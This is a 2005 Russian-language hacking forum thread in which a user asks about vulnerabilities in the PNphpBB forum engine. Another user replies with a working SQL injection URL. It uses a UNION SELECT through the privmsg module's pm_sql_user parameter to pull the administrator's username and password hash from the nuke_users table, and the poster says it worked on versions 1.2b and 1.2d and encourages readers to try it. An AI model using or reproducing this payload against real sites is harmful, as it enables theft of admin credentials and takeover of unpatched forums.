Вопрос по уязвимостям в PNphpBB (c) 2005

Discussion in 'Песочница' started by Rezet, 25 May 2005.

  1. Rezet

    Rezet New Member

    Joined:
    29 Mar 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Кто-нибудь знает уязвимости этого движка форума?
     
  2. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    кто-то знает... но скрывает =)
    на самом деле хз.. даж на секурлаб этого нет... =((
     
  3. bogusz

    bogusz New Member

    Joined:
    21 May 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Тот же phpBB, только для Post Nuke...Лень матушка, вот она где !
    Code:
    http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-
    99%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass,pn_pass,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20nuke_users%20where%20pn_uid=2/*
    Показывает Хэш админа...ЭКСПЕРЕМЕНТИРУЙ...Если только СекАпдейт не стоит...у меня прокатывало на версиях 1.2(b и d) ;)
    З.Ы. СекЛаб не всегда решает...лично я по испанским Секам загоняюсь...много интересного пишут, хоть и не всегда понятно \=)
    З.З.Ы.
    Ну, а кому косяк тратить деньги на Интернет прошу на http://sourceforge.net/project/showfiles.php?group_id=76994 --->>>Эксперементируйте на local'e.
     
    #3 bogusz, 25 May 2005
    Last edited: 25 May 2005
Loading...